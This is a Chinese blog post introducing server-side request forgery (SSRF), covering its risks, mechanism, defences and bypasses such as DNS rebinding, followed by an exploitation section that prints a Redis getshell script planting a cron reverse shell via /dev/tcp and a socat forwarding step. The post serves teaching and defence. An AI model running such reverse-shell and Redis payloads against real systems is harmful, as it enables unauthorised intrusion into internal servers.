Web安全之初识SSRF与防护

最新推荐文章于 2024-05-11 11:26:50 发布
最新推荐文章于 2024-05-11 11:26:50 发布
阅读量465 收藏 5
点赞数 2
文章标签: 安全 网络 http csrf linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46048018/article/details/110839822
版权

Web安全之初识SSRF与防护

一、什么是SSRF?

      SSRF即服务端请求伪造(Server-Side Request Forgery),通俗地来讲就是在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份向服务器所在内网发送一条信息。

二、SSRF的危害

SSRF攻击通常针的是对外部网络无法直接访问的内部系统,那么它的危害主要是以下几个方面:

  1. 利用file协议读取本地文件,比如file:///etc/passwd 攻击内网和本地的应用程序及服务。

  2. 内网、本地端口扫描,获取开放端口信息

  3. 主机信息收集,web应用指纹识别,获取服务banner信息

  4. 根据识别出的应用针对性的发送payload攻击,例如struts2

  5. 利用Redis未授权访问,HTTP CRLF注入达到反弹shell、写webshell、写ssh私钥

  6. 穿越防火墙

三、SSRF的原理

在这里插入图片描述
     攻击者想要访问主机B上的服务,但是由于存在防火墙或者主机B是属于内网主机等原因导致攻击者无法直接访问主机B。而服务器A存在SSRF漏洞,这时攻击者可以借助服务器A来发起SSRF攻击,通过服务器A向主机B发起请求,从而获取主机B的一些信息。
     SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。

四、防御方法

     首先我们需要禁用掉不需要的协议,仅允许 HTTP(s) 请求,防止使用 file:// 等其它协议读取本地文件,其次就是我们需要对输出内容进行判断,例如我应该输出一张图片,如果抓取到的是一段文本我们就不应该输出。还有就是如果抓取远端地址导致报错返回的情况,我们需要对返回给用户的内容进行统一地处理,而不是直接将远端服务器的内容返回给用户,这样就可以减少攻击者了解到更多远端服务器信息的机会。

总结一下主要有以下几个方面:

  1. 禁止不常用的协议,仅仅允许http和https请求。可以防止类似于file:///,gopher://,ftp://等引起的问题。
  2. 过滤返回的信息,如果web应用是去获取某一种类型的文件。那么在把返回结果展示给用户之前先验证返回的信息是否符合标准。
  3. 统一错误信息,避免用户可以根据错误信息来判断远程服务器的端口状态。
  4. 限制请求的端口,比如80,443,8080,8090。
  5. 使用DNS缓存或者Host白名单的方式。

在大多数情况下采用以上的处理是没有问题的,但有时候攻击者可能采用某些特殊的办法进行绕过。

五、特殊情况

1.短链接绕过
   短链接是先到短链接服务的地址之后再302跳转到真实服务器上,如果攻击者对内网地址进行短链处理之后会被判断短链服务的 IP 为合法 IP 而通过校验。

解决办法
   由于跳转后的地址也还是需要 DNS 解析的,所以只要在每次域名请求 DNS 解析处都做内网 IP 判断的逻辑即可。

2.DNS 重新绑定绕过
   DNS 重新绑定攻击简单来说就是利用 DNS 服务器来使得每次解析返回不同的 IP,当在校验 IP 的时候 DNS 解析返回合法的值,等后续重新请求内容的时候 DNS 解析返回内网 IP。这种利用了多次 DNS 解析的攻击方式就是 DNS 重新绑定攻击。
解决办法
   在抓取请求发起的时候直接判断解析的 IP,如果不符合的话直接拒绝连接。

六、漏洞利用

攻击redis服务
1.常规利用方式
   内网redis(port:6379)通常存在未授权访问的情况,防护较弱可攻击。
   首先要了解通过redis getshell的exp写成的bash shell.sh:

echo -e "nn*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1nn"|redis-cli -h $1 -p $2 -x set 1 
redis-cli -h $1 -p $2 config set dir /var/spool/cron/ redis-cli -h $1 -p $2 config set dbfilename root 
redis-cli -h $1 -p $2 save redis-cli -h $1 -p $2 quit

执行命令 bash shell.sh 127.0.0.1 6379可在redis里面写入crontab的定时任务,本地通过nc -nvlp 2333开启监听2333端口来反弹shell。
2.gopher利用方式
   我们要将普通的请求转成适配gopher协议的url,首先获取bash脚本对redis发出的访问请求,这里利用socat进行端口转发,转发命令。

socat -v tcp-listen:4444,fork tcp-connect:localhost:6379

即将访问4444端口的流量转发到6379端口。也就是说我们bash请求的是4444端口,但是访问的还是6379的redis,即端口转发。

bash shell.sh 127.0.0.1 4444 >redis.log

​ 这样就截获到redis的日志记录文件redis.log

super__tang
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SSRF防御
Binary2014的博客
01-09 1298
SSRF(Server-side Request Forge, 服务端请求伪造)。 由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务。 漏洞防护 禁用不需要的协议,仅仅允许httphttps请求,可以防止类似于file://, gopher://, ftp:// 等引起的问题。 服务端需要认证交互,禁止非正常用户访问服务; 过滤输入信息,永远不要相信用户的...
SSRF漏洞是什么,如何进行有效防护
HoewDec的博客
04-26 1488
SSRF是服务器对用户提供的可控URL过于信任,没有对攻击者提供的URL进行地址限制和足够的检测,导致攻击者可以以此为跳板攻击内网或者其它服务器由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在。1、严格校验用户输入的URL,可以使用白名单过滤来限制输入,只允许特定的协议、主机和端口,列如限制请求的端口为 http 常用的端口,80、443、8080、8090 等。图片加载存在于很多的编辑器中,编辑器上传图片处加载设定好的远程服务器上的图片地址,如果没对加载的参数做限制可能造成SSRF。
2024年最新SSRF漏洞原理攻击与防御(超详细总结),高级开发面试题及答案
最新发布
2401_84281720的博客
05-11 315
利用的是服务端的请求伪造。6、图片加载与下载:通过URL地址加载或下载图片,图片加载远程图片地址此功能用到的地方很多,但大多都是比较隐秘,比如在有些公司中的加载自家图片服务器上的图片用于展示。
WEB渗透【9】SSRF漏洞攻击与防御
司徒荆的博客
01-05 508
SSRF漏洞攻击与防御
SSRF攻击和防御
mubanxia的博客
05-28 347
SSRF攻击和防御 SSRF(Server-side Request Forgery,服务器端请求伪造)是攻击者通过向外网服务器端发起请求从而攻击内网系统。因为内网无法直接访问,而且内网和外网服务器相连。 SSRF漏洞大多存在于外网服务器提供访问其他服务器并获取数据的功能,并且没有对目标地址过滤和限制。例如:在线翻译网址内容,接收邮件的服务器地址。 内网防御一般比外网要弱,所以易受SSRF攻击。 攻击方式:将内网ip编码(绕过过滤)放在url后。根据返回错误(501,502,404,403)可以判断端口是否
SSRF原理利用与防御
安全大白
04-18 478
0x00 前言 一个认真搞安全的Student,博客用于学习总结,欢迎大家交流指出不足。 SSRF作为不可忽视的漏洞,地位举足轻重,本篇就SSRF的原理、利用、防御进行一个小小的总结。 0x01 SSRF原理 1)什么是SSRF 服务器请求伪造,攻击者利用可以发起网络请求的服务来对其他网络服务进行攻击。 2)SSRF的作用 一般用于探测内网端口信息,查看文件,甚至可以getshell 3)SSRF...
SSRF漏洞原理攻击与防御(超详细总结)
dzqxwzoe的博客
07-18 762
利用的是服务端的请求伪造。6、图片加载与下载:通过URL地址加载或下载图片,图片加载远程图片地址此功能用到的地方很多,但大多都是比较隐秘,比如在有些公司中的加载自家图片服务器上的图片用于展示。5,禁用不需要的协议。
什么是SSRF以及如何预防?
jimmyleeee的专栏
05-12 1640
SSRF就是Server-side request forgery的简称,主要是指一个攻击者通过篡改诱导服务器发起一个没有授权的或者和业务实际需求目的不一致的请求,核心就是Server发起了一个攻击者伪造的请求。 关于伪造请求,就需要了解一个请求的几个组成部分,一个HTTP的主要组成部分如下: HTTP://IP|domainname:port/path?querystring 这里的请求伪造应该是包括这个请求里的任何一个组成部分,包括协议、IP或者域名、端口、路径以及查询参数。 协议 一般Web
SSRF服务器端请求伪造漏洞之——攻防实战与防范方法
温柔小薛的博客
04-10 946
攻防实战与防范方法 bWAPP 中的 SSRF 给出了 3 个小实验来说明 SSRF 的利用场景 任务 1:使用远程文件包含进行端口扫描(内网探测) 点击任务 1 中的 Port scan 可以获得一份端口扫描的攻击脚本 仅需要包含脚本,并请求 IP 参数为对应的主机即可,接下来就是利用 bWAPP 中的远程文件包含漏洞,执行端口扫描的脚本 Choose your bug 中选择 Remote ...
SSRF——服务端请求伪造
weixin_46601374的博客
03-20 3573
什么是SSRF? 服务器端请求伪造(SSRF)是指攻击者能够从易受攻击的Web应用程序发送精心设计的请求的对其他网站进行攻击。(利用一个可发起网络请求的服务当作跳板来攻击其他服务) 什么是SSRF 攻击者能够从易受攻击的web程序,发送精心设计的请求的对其他网站进行攻击,即利用一个可发起网络请求服务当做跳板来攻击其他服务 ssrf有什么作用 一般用于探测内网端口及信息,查看文件,甚至可以getshell 攻击内外网的web应用ssrf一般存在于哪些地方 能够对外发起网络请求
简述SSRF
qq_63928796的博客
06-20 970
https://www.yuque.com/docs/share/223d2e99-aedd-4a62-8abe-bac925abdbd8?#
什么是SSRF?
qq_32799165的博客
04-24 1058
本文详细分析了服务器端请求伪造(SSRF)的概念、工作原理及其分类,并探讨了四种常见的攻击场景及相关的代码示例。文章进一步提出了多项防御SSRF攻击的策略,包括输入验证、建立访问白名单、限制URL跳转和重定向,同时强调了应用层防火墙和安全插件的重要性。通过实际攻击案例的分析,本文展现了理解SSRF攻击、识别风险并采取有效防控措施的必要性,旨在帮助开发者和组织加强网络安全防护
什么是SSRF
Ping_Pig的博客
08-13 5129
漏洞解释 SSRF(Server-Side Request Forgery,服务器请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统(正因为请求时由服务端发起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统) SSRF漏洞形成大多是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤和限制.例如,黑客操作服...
网络安全-SSRF漏洞原理、攻击与防御
热门推荐
关注网络安全、云原生安全
09-05 2万+
概述 SSRF(Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统(因为他是从内部系统访问的,所以它能够请求到与它相连而与外网隔离的内部系统。)。 原理 SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,文档等等。SSRF漏洞通过篡改获取资源的请求发送给服务器(服...
SSRF详解(包含多种SSRF攻击)
Zyu0
11-28 5308
服务器端请求伪造(也称为 SSRF)是一种 Web 安全漏洞,允许攻击者诱导服务器端应用程序向非预期位置发出请求。在典型的 SSRF 攻击中,攻击者可能会导致服务器连接到组织基础设施内的仅供内部使用的服务。在其他情况下,他们可能会强制服务器连接到任意外部系统,从而可能泄露授权凭证等敏感数据。如果攻击者能够将url参数更改为localhost,这可能允许他们查看服务器上托管的本地资源,从而使其容易受到服务器端请求伪造的攻击。滥用易受攻击的服务器与其他系统之间的信任关系绕过 IP 白名单。
SSRF漏洞原理解析
未完成的歌~的博客
02-03 6605
文章目录0x01 基础知识1、SSRF漏洞简介:2、主要攻击方式:3、漏洞形成原理:4、漏洞的危害:0x02 漏洞检测1、漏洞验证:2、漏洞的可能出现点:0x03 绕过方法:1、绕过限制为某种域名:2、绕过限制请求IP不为内网地址:3、限制请求只为http协议:0x04 漏洞利用1、产生漏洞的函数:2、漏洞靶场:0x05 如何防御SSRF 0x01 基础知识 1、SSRF漏洞简介: SSRF全称:Server-Side Request Forgery,即 服务器端请求伪造,是一个由攻击者构造请求 在目标服务
SSRF漏洞,绕过,实战化演示
m_de_g的博客
08-13 995
SSRF 漏洞 1.介绍ssrf漏洞 SSRF(Server-Side Request Forgery,服务度器端请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统)。 2.SSRF漏洞原理 SSRF的形成大多是由于服务端提供了从其他服务器应用数据的功能且没有对目标地址做过过滤与限制。例如,黑客操作服务器端从URL地址获取网页文本内容,加载指定地址的图片等,利用的
SSRF学习详解与实践
不想当脚本小子的脚本小子
01-24 908
原理:SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。注释:除了http/https等方式可以造成ssrf,类
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值